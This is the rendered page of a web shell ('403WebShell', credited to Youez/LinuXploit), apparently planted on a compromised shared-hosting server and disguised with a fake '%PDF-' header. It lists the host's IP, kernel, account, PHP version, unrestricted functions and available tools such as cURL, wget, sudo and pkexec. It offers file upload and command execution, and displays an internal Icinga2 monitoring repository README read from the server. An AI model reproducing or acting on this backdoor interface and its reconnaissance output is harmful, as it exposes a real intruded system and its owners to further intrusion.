%PDF- %PDF- 403WebShell
403Webshell
Server IP : 79.170.40.229  /  Your IP : 3.144.88.216
Web Server : Apache
System : Linux web232.extendcp.co.uk 4.18.0-513.24.1.el8_9.x86_64 #1 SMP Mon Apr 8 11:23:13 EDT 2024 x86_64
User : 1stforcarhirealicante.com ( 296923)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /proc/thread-self/root/opt/icinga2-enterprise/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/thread-self/root/opt/icinga2-enterprise/README.md
# icinga2-enterprise repository
This repository contains useful software from the monitoring team

## Repository structure
In this repository there are several directories. The structure:
```
icinga2-enterprise
├── README.md
├── checks                                        | Checks folder, here please put your checks/plugins for
│   ├── README.md                                 | Linux platform, you can create here subfolders with own
│   ├── check-cloudwatch-status.sh                | scripts/tools etc...
│   ├── check_aggregate_services.py               |
│   ├── nagios-plugins                            | This folder contains official Nagios plugins, don't put anything here,
│   │   └── README.md                             | it will be removed during the package building process.
│   └── windows                                   | This folder contains checks/plugins for Windows platform,
│       ├── README.md                             | please put here only Windows binaries or bat scripts
│       └── check-cloudwatch-status-windows.bat   |
├── handlers                                      | This folder contains handlers, for example for auto remediation process,
│   ├── README.md                                 | or for other staff, can include only linux binaries/scripts
│   └── restart_service.sh                        |
├── ica                                           | This folder contains the ICA tool, which helps you in auto registration
│   ├── Icinga2Agent.psm1                         | of your clients to the Icinga cluster/server.
│   ├── README.md                                 | It also contains patch files, config files, etc..
│   ├── config.yml                                | During the build process main.go compiles to go binary for
│   ├── icinga2-execvp-patch                      | specified platform (Linux/Windows)
│   ├── icinga_kickstart.bash                     |
│   └── main.go                                   |
└── sudoers.d                                     | This folder contains permission files for Linux systems,
    └── icinga2-enterprise                        | put your own permissions file or modify existing to grant permissions
                                                  | to your scripts
```


## Build process
During automated build process from this repository we a creating zip, tar, rpm, deb packages for different platforms and architectures and put them to Godaddy's internal repositories

## Support
If you have any problems with this repo, please ask maintainers for help.
```
slack - #monitoring
email - monitoring@godaddy.com
```

Youez - 2016 - github.com/yon3zu
LinuXploit